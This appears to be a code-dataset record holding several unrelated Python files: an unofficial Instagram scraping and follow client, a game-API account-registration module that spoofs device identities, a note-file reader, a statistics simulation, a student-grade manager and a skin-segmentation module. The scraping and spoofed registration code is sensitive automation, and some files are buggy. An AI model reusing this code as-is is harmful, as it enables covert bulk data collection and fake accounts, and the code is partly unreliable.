self.session.headers.update({'x-csrftoken' : login_response.cookies['csrftoken']})\n self.cookies = login_response.cookies\n print(\"Logged in as: {}\".format(username))\n\n def update_ig_gis_header(self, params):\n if self.is_login == False:\n self.set_headers()\n\n self.session.headers.update({\n 'x-instagram-gis': self.get_ig_gis(\n self.rhx_gis,\n params\n )\n })\n\n @staticmethod\n def get_ig_gis(rhx_gis, params):\n return hashlib.md5((str(rhx_gis) + \":\" + str(params)).encode('utf-8')).hexdigest()\n\n def get_user_id(self, username):\n if self.login == True:\n return self.__get_user_id_with_login(username)\n return self.__get_user_id_without_login(username)\n\n def __get_user_id_with_login(self, username):\n ''' Basic API calling\n username = username of target instagram user\n return data will be the ID of the target user\n '''\n user_data = self.session.get('{}{}/?__a=1'.format(INSTAGRAM_URL, username)).content\n return json.loads(user_data)['graphql']['user']['id']\n\n def __get_json_field(self, url):\n response_content = self.session.get(url).content\n return response_content[str(response_content).find('{\"config')-300:]\n\n def __get_user_id_without_login(self, username):\n config_data = self.__get_json_field('{}{}'.format(INSTAGRAM_URL, username))\n return re.findall('\"id\":\"(.*)\",\"is_business', str(config_data))[0]\n\n def __get_ajax_rollout_hash(self):\n config_data = self.__get_json_field(INSTAGRAM_URL)\n ajax_hash = re.findall('\"rollout_hash\":\"(.*)\",\"bundle_variant\"', str(config_data))[0]\n self.session.headers.update({'X-Instagram-AJAX' : ajax_hash})\n\n def get_user_posts_by_id_on_feed(\n self,\n user_id,\n include_changing = 'false',\n include_reel = 'false',\n include_suggested_users = 'false',\n include_logged_out_extras = 'false',\n include_highlight_reels = 'false'\n ):\n params = QUERY_USER_FEED.format(user_id, include_changing, include_reel, include_suggested_users, include_logged_out_extras, include_highlight_reels)\n self.update_ig_gis_header(params)\n return self.session.get(QUERY_USER_FEED_URL.format(params)).content\n\n def get_user_posts_by_id(self, user_id, from_post = '', count = 12):\n ''' Basic API calling, which defaultly called,\n user_id = the requested profile user_id\n from_post = api fetching posts always releated from a post id\n\n the QUERY_MEDIA_VARS \"first\" param is setted to 12, because api defaultly request 12 posts, max 50\n '''\n params = QUERY_MEDIA_VARS.format(user_id, count, from_post)\n self.update_ig_gis_header(params)\n return self.session.get(QUERY_MEDIA_URL.format(params)).content\n\n def get_post_data_by_shortcode(self, shortcode):\n ''' Basic API calling\n shortcode = shortcode of the targeted post\n return data will be all available information from the post\n '''\n params = POST_MEDIA_VARS.format(shortcode)\n self.update_ig_gis_header(params)\n return self.session.get(POST_MEDIA_URL.format(params)).content\n\n def get_search_posts_by_tag(self, tag, show_ranked = False, first = 1, after = ''):\n ''' Basic API calling\n tag = the search keyword (normal search, not location, people etc)\n return data will contain the posts and the search cursor\n '''\n params = QUERY_SEARCH_TAG_VARS.format(tag, show_ranked, first, after)\n self.update_ig_gis_header(params)\n return self.session.get(QUERY_SEARCH_TAG_URL.format(params)).content\n\n def get_post_liker_list_by_shortcode(self, shortcode, include_reel = 'false', number_of_likers = 24):\n params = QUERY_POST_LIKERS_VARS.format(shortcode, include_reel, number_of_likers)\n self.update_ig_gis_header(params)\n return self.session.get(QUERY_POST_LIKERS_URL.format(params)).content\n\n def get_user_follows_by_id(self, user_id, include_reel = False, fetch_mutual = False, first = 24, after = ''):\n params = QUERY_USER_FOLLOWS_BY_ID_VARS.format(user_id, include_reel, fetch_mutual, first, after)\n self.update_ig_gis_header(params)\n return self.session.get(QUERY_USER_FOLLOWS_BY_ID_URL.format(params)).content\n\n def get_user_followers_by_id(self, user_id, include_reel = False, fetch_mutual = False, first = 24, after = ''):\n params = QUERY_USER_FOLLOWERS_BY_ID_VARS.format(user_id, include_reel, fetch_mutual, first, after)\n self.update_ig_gis_header(params)\n return self.session.get(QUERY_USER_FOLLOWERS_BY_ID_URL.format(params)).content\n\n def follow_user_by_id(self, user_id):\n self.__get_ajax_rollout_hash()\n resp = self.session.post('https://www.instagram.com/web/friendships/{}/follow/'.format(user_id))\n print(resp.content)\n print(resp)\n","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":7017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"323849779","text":"import glob\nimport os.path\n\ndef get_all_file_path_start_from(dir_path_pattern):\n return glob.glob(dir_path_pattern)\n\ndef get_all_posts():\n \"\"\"Get all posts files info. return an array of dictionary\n {\n \"title\": \"Day 001\",\n \"path\": \"/2016-04-01-day001-zh.md\"\n }\n \"\"\"\n \n files_path_list = get_all_file_path_start_from(\"./static/notes/*\")\n\n output = []\n \n for file_path in files_path_list:\n file_detail = {\n \"title\": file_path.split(\"/\")[-1],\n \"path\": file_path\n }\n output.append(file_detail)\n\n return output\n\ndef get_note_content_with_filename(filename):\n \"\"\"Return the full content of note with given filename\n \"\"\"\n output = \"\"\n\n file_path = \"./static/notes/\" + filename\n \n if os.path.isfile(file_path):\n with open(file_path) as file:\n for line in file:\n output += line + \"\\n\"\n return output\n else:\n return \"File Not Found\"\n \n","sub_path":"XYToolBox.py","file_name":"XYToolBox.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"566455141","text":"import warnings\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pylab as plt\n\nfrom python.sim import *\nfrom python.fileDump import *\nfrom python.raw_data import *\nimport re\nimport time\n\nwarnings.filterwarnings(\"error\")\n\nimport numpy as np\nimport pdb\nimport os \n\nif __name__ == '__main__':\n EXCHANGEABLE=[]\n NORM_SIG=False\n RAT=False\n MOUSE=True\n CROSS_N=None#'iid-ggnull-ghc'\n \n parms={\n 'Types':['hc','gnull','bj','fdr','minP','score','ggnull','ghc'],\n 'plot':True,\n 'H0':50000,\n 'H01':30000,\n 'H1':30000,\n 'fontsize':17,\n 'new':True\n }\n \n if len(EXCHANGEABLE)>0:\n for N in [500,1000,1500,2000,2500,3000,3500,4000,4500,5000]:\n for rho in EXCHANGEABLE: \n sig,_=exchangeable(N,rho)\n sigName='iid-ggnull-ghc-'+str(N)\n \n fileDump(sim({**parms,'sigName':sigName,'N':N,'sig':sig,'muRange':np.unique(np.linspace(2,3,10)).round(3),\n 'epsRange':np.unique(np.linspace(2,N*(.008 if N>2000 else .01 if N>1000 else .017),10).round()).astype(int)}))\n\n if NORM_SIG:\n N=1000\n sig,sigName=norm_sig(N,1.1)\n fileDump(sim(N,H0,H1,sigName,sig,delta))\n\n sig,sigName=norm_sig(N,1.2)\n fileDump(sim(N,H0,H1,sigName,sig,delta))\n\n sig,sigName=norm_sig(N,1.3)\n fileDump(sim(N,H0,H1,sigName,sig,delta))\n\n if MOUSE:\n for N in [500,1000,1500,2000,2500,3000,3500,4000,4500,5000,5500,6000,6500,7000,7500,8000,8500,9000,10000]:\n sig=raw_data('../../data/pre_pca_hip_mouse.csv',N)\n sigName='mouse'+str(N)\n\n fileDump(sim({**parms,'sigName':sigName,'N':N,'sig':sig,'muRange':np.unique(np.linspace(2,3,10)).round(3),\n 'epsRange':np.unique(np.linspace(2,N*(.008 if N>2000 else .01 if N>1000 else .017),10).round()).astype(int)}))\n\n if RAT:\n N=200\n sig,sigName=raw_data('rat.csv','rat',N)\n fileDump(sim(N,H0,H1,sigName,sig,mu_delta,eps_frac,Run))\n \n if CROSS_N is not None:\n sigName=CROSS_N\n H1=parms['H1']\n \n power=pd.DataFrame()\n \n fileList=[(y.group(0),int(y.group(1))) for x in os.listdir() for y in [re.search(\n '../raw/raw-power-'+sigName+'-([0-9]+).csv',x)] if y is not None]\n for name,N in fileList:\n tmp=pd.read_csv(name).reset_index(drop=True)\n power=power.append(tmp.merge(pd.DataFrame([N]*len(tmp),index=range(len(tmp)),columns=['N']),left_index=True,\n right_index=True))\n\n nPlot(power,H1,sigName) \n ","sub_path":"ail/oldPython/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"536844374","text":"import requests\r\nimport config\r\nimport crypto\r\nimport json\r\nimport random\r\n\r\ndef register(ver, os, ad = None, unique = None, key = None):\r\n if os == 'android':\r\n dn = config.device_name1\r\n dm = config.device_model1\r\n dv = config.device_ver1\r\n dua = config.device_agent1\r\n else:\r\n dn = config.device_name2\r\n dm = config.device_model2\r\n dv = config.device_ver2\r\n dua = config.device_agent2\r\n if ver == 'gb':\r\n url = config.gb_url + '/auth/sign_up'\r\n code = config.gb_code\r\n else:\r\n url = config.jp_url + '/auth/sign_up'\r\n code = config.jp_code\r\n headers = {\r\n 'Accept': '*/*',\r\n 'Content-Type': 'application/json',\r\n 'X-Platform': os,\r\n 'X-ClientVersion': code,\r\n 'X-Language': config.lang,\r\n 'User-Agent': dua\r\n }\r\n data = None\r\n acc_ad = None\r\n acc_unique = None\r\n if ad != None and unique != None and key != None:\r\n user_acc = {\r\n 'ad_id': ad,\r\n 'country': config.country,\r\n 'currency': config.currency,\r\n 'device': dn,\r\n 'device_model': dm,\r\n 'os_version': dv,\r\n 'platform': os,\r\n 'unique_id': unique\r\n }\r\n data = {'captcha_session_key': key, 'user_account': user_acc}\r\n else:\r\n unique = crypto.guid()\r\n acc_ad = unique[0]\r\n acc_unique = unique[1]\r\n user_acc = {\r\n 'ad_id': unique[0],\r\n 'country': config.country,\r\n 'currency': config.currency,\r\n 'device': dn,\r\n 'device_model': dm,\r\n 'os_version': dv,\r\n 'platform': os,\r\n 'unique_id': unique[1]\r\n }\r\n data = {'user_account': user_acc}\r\n r = requests.post(url, data=json.dumps(data), headers=headers)\r\n return [r.json(), acc_ad, acc_unique]\r\n\r\ndef login(ver, os, basic, first, key = None):\r\n if os == 'android':\r\n dn = config.device_name1\r\n dm = config.device_model1\r\n dv = config.device_ver1\r\n dua = config.device_agent1\r\n else:\r\n dn = config.device_name2\r\n dm = config.device_model2\r\n dv = config.device_ver2\r\n dua = config.device_agent2\r\n if ver == 'gb':\r\n url = config.gb_url + '/auth/sign_in'\r\n if first:\r\n code = '////'\r\n else:\r\n code = config.gb_code\r\n else:\r\n url = config.jp_url + '/auth/sign_in'\r\n if first:\r\n code = config.jp_code\r\n else:\r\n code = config.jp_code\r\n headers = {\r\n 'Accept': '*/*',\r\n 'Authorization': 'Basic ' + str(basic),\r\n 'Content-Type': 'application/json',\r\n 'X-UserCountry': config.country,\r\n 'X-UserCurrency': config.currency,\r\n 'X-Platform': os,\r\n 'X-ClientVersion': code,\r\n 'X-Language': config.lang,\r\n 'User-Agent': dua\r\n }\r\n if key != None:\r\n data = {'captcha_session_key': key, 'ad_id': config.ad, 'unique_id': config.uuid}\r\n else:\r\n data = {'ad_id': config.ad, 'unique_id': config.uuid}\r\n r = requests.post(url, data=json.dumps(data), headers=headers)\r\n return r.json()","sub_path":"api/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"145469455","text":"#한글 줄맞춤 출력을 위한 unicode\r\nimport unicodedata\r\n#cmd_list : 명령어의 종류\r\ncmd_list = ['A', 'D', 'F', 'M', 'P', 'R', 'S', 'Q', 'W']\r\n#db_attribute : 데이터의 속성명칭\r\ndb_attribute = ['일련번호', '학생 id', '이름', '생년월일', '중간고사', '기말고사', '평균', 'Grade']\r\n#db_data : 실질적인 데이터, 각 사람별로 nested list 형식으로 저장됨, 생년월일은 모두 각각 따로 저장됨\r\ndb_data = []\r\n\r\ndef preformat_cjk (string, width, align='>', fill=' '):\r\n count = (width - sum(1 + (unicodedata.east_asian_width(c) in \"WF\")\r\n for c in string))\r\n return {\r\n '>': lambda s: fill * count + s,\r\n '<': lambda s: s + fill * count,\r\n '^': lambda s: fill * (count / 2)\r\n + s\r\n + fill * (count / 2 + count % 2)\r\n}[align](string)\r\n\r\n\r\n\r\n#생년월일 체크를 위한 윤년 계산기\r\ndef leap_year(year):\r\n if (year%4==0 and year%100!=0) or year%400==0:\r\n return True\r\n return False\r\n\r\n\r\n#올바른 생년월일인지 판별하는 함수\r\ndef valid_date(y,m,d):\r\n cal = [31,28,31,30,31,30,31,31,30,31,30,31]\r\n if y<0:\r\n return False\r\n if m<0 or m>12:\r\n return False\r\n if d<0 or (leap_year(y) and m==2 and d>29) or (leap_year(y) and m!=2 and d>cal[m-1]) or ((not leap_year(y)) and d>cal[m-1]):\r\n return False\r\n return True\r\n\r\n\r\n#파일의 포멧이 잘못되었을때 에러를 출력하는 함수\r\ndef print_format_error(num, chk):\r\n print(f\"file format error in {db_attribute[chk]} on line {num}!\")\r\n\r\n\r\n#파일의 데이터가 잘못되었을때 에러를 출력하는 함수\r\ndef print_data_error(num, chk):\r\n print(f\"file data error in {db_attribute[chk]} on line {num}!\")\r\n\r\n \r\n#파일의 한줄을 파싱하는 함수\r\ndef parse_file(num, line): \r\n temp = []\r\n chk = 0\r\n try: \r\n temp.append(int(line[0])); chk+=1 \r\n temp.append(str(line[1])); chk+=1 \r\n temp.append(str(line[2])); chk+=1 \r\n temp.append(int(line[3].split('-')[0]))\r\n temp.append(int(line[3].split('-')[1]))\r\n temp.append(int(line[3].split('-')[2])); chk+=1 \r\n temp.append(int(line[4])); chk+=1 \r\n temp.append(int(line[5])); chk+=1 \r\n except:\r\n print_format_error(num, chk)\r\n return [-1]\r\n \r\n count = sum(1 + (unicodedata.east_asian_width(c) in \"WF\") for c in temp[1])\r\n if count>10:\r\n print(f\"Too long name! on line{num}\")\r\n return [-1]\r\n\r\n if not valid_date(temp[3], temp[4], temp[5]):\r\n print_data_error(num, 3)\r\n return [-1]\r\n\r\n if temp[6]<0 or temp[6]>100:\r\n print_data_error(num, 4)\r\n return [-1]\r\n\r\n if temp[7]<0 or temp[7]>100:\r\n print_data_error(num, 5)\r\n return [-1]\r\n\r\n temp.append((temp[6] + temp[7]) / 2)\r\n if temp[8]>=90:\r\n temp.append('A')\r\n elif temp[8]>=70:\r\n temp.append('B')\r\n elif temp[8]>=50:\r\n temp.append('C')\r\n elif temp[8]>=30:\r\n temp.append('D')\r\n else :\r\n temp.append('F')\r\n\r\n return temp\r\n#파일 전체를 읽는 함수\r\ndef read_file(filename):\r\n f_data = result = [] \r\n global db_data\r\n try:\r\n with open(filename, 'r') as f:\r\n f_data = f.readlines()\r\n except:\r\n print('Could not open file.')\r\n else:\r\n for num, i in zip(range(len(f_data)), f_data): \r\n line = parse_file(num+1, i.replace('\\n',\"\").split('\\t')) \r\n if line==[-1]:\r\n return [-1]\r\n else:\r\n if str(line[1]) in list(x[1] for x in result):\r\n print(f\"student ID is doubled in {num+1}\")\r\n return [-1]\r\n result.append(line)\r\n db_data = result\r\n\r\n# 최초 파일 DB update(by bong)\r\n# read_file() r을 통한 명시적 읽기 필요(by jang)\r\n\r\n# for 'cmd M' function(by bong)\r\ndef find_in_sublists(lst, value):\r\n for sub_i, sublist in enumerate(lst):\r\n try:\r\n global f_M\r\n f_M= [sub_i, sublist.index(value)]\r\n return f_M\r\n except ValueError:\r\n pass\r\n\r\n raise ValueError('%s is not in lists' % value)\r\n\r\n#사용자로부터 적합한 명령 입력을 요구하는 함수\r\ndef input_cmd():\r\n while True:\r\n try:\r\n x = str(input(\"Choose one of the options below : \")).upper()\r\n except:\r\n print(\"Wrong input\\n\")\r\n continue\r\n if x in cmd_list:\r\n return x\r\n print(\"Wrong input\\n\")\r\n\r\n#!!!각 명령별 작업 코드!!!!\r\ndef pcs_a(): \r\n global db_data\r\n while True:\r\n try:\r\n addid = str(input(\"Input Add student ID : \"))\r\n if int(addid)>0 and int(addid)<99999999:\r\n if addid in list(x[1] for x in db_data):\r\n print(\"student ID is in use\")\r\n else:\r\n addid = addid\r\n break\r\n else:\r\n print(\"student ID should be in format of ########\")\r\n except:\r\n print(\"student ID should be in format of ########\")\r\n\r\n \r\n while True:\r\n try:\r\n addname = str(input(\"Input Add student name : \")) \r\n count = sum(1 + (unicodedata.east_asian_width(c) in \"WF\") for c in addname)\r\n print(count)\r\n if count<=10: \r\n break\r\n print(\"The name is too long\")\r\n except:\r\n print(\"Error\")\r\n\r\n while True:\r\n try:\r\n addbirthyear = int(input(\"Input Add student Year Of Birth : \"))\r\n addbirthmonth = int(input(\"Input Add student Month Of Birth : \"))\r\n addbirthday = int(input(\"Input Add student Day Of Birth : \")) \r\n if valid_date(addbirthyear, addbirthmonth, addbirthday):\r\n break\r\n except:\r\n print(\"Please input valid date\")\r\n print(\"Plase input valid date\")\r\n\r\n while True:\r\n try:\r\n addmid = int(input(\"Input Add student midscore : \"))\r\n if addmid>=0 and addmid<=100:\r\n break\r\n except:\r\n print(\"Please input number\")\r\n print(\"out of score range 0~100\")\r\n while True:\r\n try:\r\n addfinal = int(input(\"Input Add student finalscore : \"))\r\n if addfinal>=0 and addfinal<=100:\r\n break\r\n except:\r\n print(\"Please input number\")\r\n print(\"out of score range 0~100\")\r\n\r\n index = len(db_data)+1\r\n\r\n values = [index, addid,addname,addbirthyear,addbirthmonth,addbirthday,addmid,addfinal,(addmid+addfinal)/2]\r\n if values[8]>=90:\r\n values.append('A')\r\n elif values[8]>=70:\r\n values.append('B')\r\n elif values[8]>=50:\r\n values.append('C')\r\n elif values[8]>=30:\r\n values.append('D')\r\n else :\r\n values.append('F')\r\n db_data.append(values)\r\n\r\ndef pcs_d():\r\n print(\"Process D\")\r\n del_idORname=str(input(\"Enter the id or name that you want to delete student : \"))\r\n del1 = find_in_sublists(db_data,del_idORname)\r\n del2 = del1[0]\r\n a = db_data[del2]\r\n while True:\r\n try :\r\n input_d = int(input(\"정말로 삭제하시겠습니까?(1.네, 2.아니오) : \"))\r\n except :\r\n print(\"Input Error!\")\r\n continue\r\n else :\r\n if input_d in [1,2]:\r\n break \r\n print(\"1 이나 2의 숫자만 선택 가능합니다.\")\r\n if input_d == 1:\r\n db_data.remove(a)\r\n print(\"삭제되었습니다\")\r\n else:\r\n print(\"취소되었습니다\")\r\n \r\n for n in range(len(db_data)):\r\n db_data[n][0] = n+1\r\n \r\ndef pcs_f():\r\n print(\"Process F\")\r\n while True:\r\n try:\r\n f_idORname=str(input(\"Enter the id or name that you want to find student : \"))\r\n f1 = find_in_sublists(db_data,f_idORname)\r\n f2 = f1[0]\r\n find_target = db_data[f2]\r\n print(f\"해당학생의 중간, 기말 평균점수는 {find_target[8]}이고 등급은 {find_target[9]} 입니다\")\r\n break\r\n except ValueError:\r\n print(\"Oops! That was no data. Try again...\")\r\n continue\r\n \r\n# modify (by bong)\r\ndef pcs_m():\r\n print(\"Process M\")\r\n modify_idORname=str(input(\"Enter the id or name that you want to modify score : \"))\r\n modify_ctg=input(\"1. 중간고사 \\n2. 기말고사 \\nEnter the number you want to modify score : \")\r\n modify_score=int(input(\"Enter the score you want to input : \"))\r\n while (modify_idORname not in [j for i in db_data for j in i]):\r\n print(\"Your first input data is not right\")\r\n break\r\n find_in_sublists(db_data,modify_idORname)\r\n if modify_ctg in [\"1\",\"2\"]:\r\n if modify_ctg==\"1\":\r\n modify_ctg_idx=6\r\n else:\r\n modify_ctg_idx=7\r\n else:\r\n print(\"Your second input data is not right\")\r\n db_data[f_M[0]][modify_ctg_idx]=modify_score\r\n for i in db_data:\r\n print(i)\r\n# # print (by bong)\r\ndef pcs_p(data):\r\n if data==[]:\r\n print(\"No Data!\")\r\n else:\r\n print(\"일련번호 학생id 이름 생년월일 중간고사 기말고사 평 균 등급 \")\r\n for i in data: \r\n print(f\" {i[0]:<3} {i[1]:>12} {preformat_cjk(i[2],10)} {i[3]:>8}-{i[4]:02d}-{i[5]:02d} {i[6]:>7} {i[7]:>11} {i[8]:12.1f} {i[9]:>6}\")\r\n \r\n\r\n# read (by bong) 파일내용이 [순번, id, 이름, 생년월일]로 구성\r\ndef pcs_r():\r\n print(\"Process R\")\r\n x=str(input(\"Enter the file name : \"))\r\n if x==\"\":\r\n print(\"Read file by default name : data.txt\")\r\n x = \"data.txt\"\r\n read_file(x)\r\n\r\ndef pcs_s():\r\n print(\"Process s\")\r\n while True:\r\n try :\r\n input_a = int(input(\"정렬 기준을 선택해주세요(1.이름, 2.평균점수, 3.Grade) : \"))\r\n except :\r\n print(\"Input Error!\")\r\n continue\r\n else :\r\n if input_a in [1,2,3]:\r\n break \r\n print(\"1 ~ 3번까지 숫자만 선택 가능합니다.\")\r\n if input_a == 1:\r\n print(\"************************************이름순으로 정렬하겠습니다.************************************\")\r\n sorted_data = sorted(db_data, key = lambda x : x[2])\r\n pcs_p(sorted_data)\r\n elif input_a ==2:\r\n print(\"************************************평균점수순으로 정렬하겠습니다.************************************\")\r\n sorted_data = sorted(db_data, key = lambda x : x[8],reverse=True)\r\n pcs_p(sorted_data)\r\n elif input_a==3:\r\n print(\"************************************Grade순으로 정렬하겠습니다.***********************************\")\r\n sorted_data = sorted(db_data, key = lambda x : x[8],reverse=True)\r\n pcs_p(sorted_data)\r\n \r\ndef pcs_q():\r\n print(\"Process Q\")\r\n print(\"Bye!\")\r\ndef pcs_w():\r\n print(\"Process W\")\r\n try:\r\n with open('report.txt', 'w') as f2:\r\n print(\"***********************************************성 적 표***********************************************\", file = f2)\r\n print(\" 일련번호 학생id 이름 생년월일 중간고사 기말고사 평 균 등급 \", file = f2)\r\n for i in range(len(db_data)): \r\n print(\" {:>4} {:^10} {} {}.{:>3}.{:>3} {:>6} {:>6} {:.1f} {:>8}\"\r\n .format(db_data[i][0], db_data[i][1], db_data[i][2], db_data[i][3], db_data[i][4],db_data[i][5],db_data[i][6],db_data[i][7],db_data[i][7],db_data[i][7]), file = f2)\r\n print(\"The file has been saved to 'report.txt'.\")\r\n except:\r\n print('Could not save file.')\r\nwhile True:\r\n cmd = input_cmd()\r\n if cmd == 'A':\r\n pcs_a()\r\n elif cmd == 'D':\r\n pcs_d()\r\n elif cmd == 'F':\r\n pcs_f()\r\n elif cmd == 'M':\r\n pcs_m()\r\n elif cmd == 'P':\r\n pcs_p(db_data)\r\n elif cmd == 'R':\r\n pcs_r()\r\n elif cmd == 'S':\r\n pcs_s()\r\n elif cmd == 'Q':\r\n break\r\n elif cmd == 'W':\r\n pcs_w()\r\n print('')\r\n\r\n","sub_path":"project_bum_final.py","file_name":"project_bum_final.py","file_ext":"py","file_size_in_byte":12354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"322063297","text":"\"\"\"\nhttps://ieeexplore.ieee.org/document/7783247\nSkin Color Segmentation Using\nMulti-Color Space Threshold\n1Romi Fadillah Rahmat, 2Tengku Chairunnisa, 3Dani Gunawan, 4Opim Salim Sitompul\n1,2,3Department of Information Technology\nFaculty of Computer Science and Information Technology\nUniversity of Sumatera Utara\nMedan, Indonesia\n1romi.fadillah@usu.ac.id\n2tengku.chairunnisa@students.usu.ac.id\n3danigunawan@usu.ac.id\n4opim@usu.ac.id\n978-1-5090-2549-7/16/$31.00 ©2016 IEEE\nSkin Color Segmentation Using\nMulti-Color Space Threshold\n\"\"\"\n\n# https://nalinc.github.io/blog/2018/skin-detection-python-opencv/\n\n# Required modules\nimport cv2\nimport imutils\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom utils.hsv_rgb_ycrcb import Skin_Detect\nfrom utils.ImageUtils import ImgUtils\n\n\nclass SkinTrimUtilsTestByStep:\n _sd = Skin_Detect()\n\n COLOR_SPACE_RGB = 0\n COLOR_SPACE_HSV = 1\n COLOR_SPACE_YCrCb = 2\n COLOR_SPACE_Lab = 3\n COLOR_SPACE_RGB_HSV_YCrCb = 4\n\n @staticmethod\n def getMaskAndResult(image, colorType=COLOR_SPACE_RGB_HSV_YCrCb):\n if colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_RGB_HSV_YCrCb:\n mask = SkinTrimUtilsTestByStep._sd.RGB_H_CbCr(image, False)\n mask = mask.astype(np.uint8)\n mask *= 255\n # mask = SkinTrimUtilsTestByStep.erode(mask)\n # mask = SkinTrimUtilsTestByStep.dilate(mask)\n return mask\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_RGB:\n pass\n\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_Lab:\n pass\n\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_HSV:\n pass\n\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_YCrCb:\n pass\n\n\n @staticmethod\n def getColorSpaceMask(image, colorType=COLOR_SPACE_RGB_HSV_YCrCb):\n minRange = np.array([0, 0, 0], np.uint8)\n maxRange = np.array([255, 255, 255], np.uint8)\n if colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_RGB_HSV_YCrCb:\n \"\"\"\n 数据来源:\n Nusirwan Anwar bin Abdul Rahman, Kit Chong Wei and John See†\n RGB-H-CbCr Skin Colour Model for Human Face Detection\n Faculty of Information Technology, Multimedia University\n johnsee@mmu.edu.my†\n :param image:\n :return:\n \"\"\"\n mask = SkinTrimUtilsTestByStep._sd.RGB_H_CbCr(image, False)\n mask = mask.astype(np.uint8)\n mask *= 255\n # mask = SkinTrimUtilsTestByStep.erode(mask)\n # mask = SkinTrimUtilsTestByStep.dilate(mask)\n return mask\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_RGB:\n \"\"\"\n 数据来源:\n Available online at www.sciencedirect.com\n Manuel C. Sanchez-Cuevas, Ruth M. Aguilar-Ponce, J. Luis Tecpanecatl-Xihuitl\n A Comparison of Color Models for Color Face Segmentation\n 100 < R < 160, 80 < G <, 50 < B < 120\n :param img:\n :return:\n \"\"\"\n minRange = np.array([50, 80, 100], np.uint8)\n maxRange = np.array([120, 255, 160], np.uint8)\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_Lab:\n \"\"\"\n 范围:\n This outputs 0≤L≤100, −127≤a≤127, −127≤b≤127 . The values are then converted to the destination data type:\n 8-bit images: L←L∗255/100,a←a+128,b←b+128\n L:0-180\n a:0-255\n b:0-255\n :param image:\n :return:\n \"\"\"\n minRange = np.array([0, 128, 127], np.uint8)\n maxRange = np.array([235, 143, 158], np.uint8)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2Lab)\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_HSV:\n \"\"\"\n 色相是颜色模型的颜色部分,并表示为0到360度之间的数字。在OpenCV中为0-180。定义主色[R,Y,G,C,B,M]\n 饱和度是颜色中的灰色量,从0到100%。\n 值与饱和度结合使用,并描述颜色的亮度或强度(0%至100%)。\n\n 范围来源: Tsekeridou, S. and Pitas, I., “Facial feature extraction in frontal\n views using biometric analogie,” in 9th European Signal Processing\n Conference (EUSIPCO 1998), 1998, pp. 1-4\n\n In previous research, Tsekeridou and Pitas [22] had\n selected pixels having skin color by setting thresholds as\n 换算关系:\n 8-bit images: V←255V,S←255S,H←H/2(to fit to 0 to 255)\n 标准:\n V >= 40,\n 0.2 < S < 0.6\n 0 < H < 25 OR 335< H < 360\n 转换成OpenCV\n V >= 40\n 51 < S < 153\n 0 < H < 13或者 177 < H < 180\n :param image:\n :return:\n \"\"\"\n # minRange = np.array([0, 51, 40], dtype=\"uint8\")\n # maxRange = np.array([13, 255, 255], dtype=\"uint8\")\n minRange = np.array([0, 0, 0], dtype=\"uint8\")\n maxRange = np.array([13, 255, 255], dtype=\"uint8\")\n image = cv2.cvtColor(image, cv2.COLOR_BGR2HLS)\n elif colorType == SkinTrimUtilsTestByStep.COLOR_SPACE_YCrCb:\n minRange = np.array([0, 133, 77], np.uint8)\n maxRange = np.array([255, 173, 127], np.uint8)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2YCrCb)\n\n mask = cv2.inRange(image, minRange, maxRange)\n # mask = SkinTrimUtilsTestByStep.erode(mask)\n # mask = SkinTrimUtilsTestByStep.dilate(mask)\n return mask\n\n @staticmethod\n def erode(skinMask):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11))\n skinMask = cv2.erode(skinMask, kernel, iterations=1)\n return skinMask\n\n @staticmethod\n def dilate(skinMask):\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11))\n skinMask = cv2.dilate(skinMask, kernel, iterations=1)\n return skinMask\n\n @staticmethod\n def gaussianBlur(skinMask):\n skinMask = cv2.GaussianBlur(skinMask, (3, 3), 0)\n return skinMask\n\n\ndef testVideo():\n videoCapture = cv2.VideoCapture(1)\n while videoCapture.isOpened():\n # image = cv2.imread(\"../..\")\n flag, frame = videoCapture.read()\n if not flag:\n break\n frame = imutils.resize(frame, width=800)\n cv2.imshow('rgb', SkinTrimUtilsTestByStep.rgb(frame))\n cv2.imshow('hsv', SkinTrimUtilsTestByStep.hsv(frame))\n cv2.imshow('yCrCb', SkinTrimUtilsTestByStep.YCrCb(frame))\n cv2.imshow('lab', SkinTrimUtilsTestByStep.Lab(frame))\n cv2.imshow('rgb_hsv_ycbcr', SkinTrimUtilsTestByStep.rgb_hsv_ycbcr(frame))\n # cv2.imshow('melt', melt(frame))\n\n # Hit 'q' on the keyboard to quit!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n videoCapture.release()\n cv2.destroyAllWindows()\n\n\ndef putTextTo(img, text):\n cv2.putText(img, text, (1, 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255), cv2.LINE_4)\n\n\ndef showImage(frame, title=None):\n # frame = cv2.imread(\"../../faces/7.jpeg\")\n frame = imutils.resize(frame, width=300)\n cv2.imshow(\"original_\" + title, frame)\n melt = SkinTrimUtilsTestByStep.getColorSpaceMask(frame, SkinTrimUtilsTestByStep.COLOR_SPACE_RGB_HSV_YCrCb)\n putTextTo(melt, \"melt\")\n hsv = SkinTrimUtilsTestByStep.getColorSpaceMask(frame, 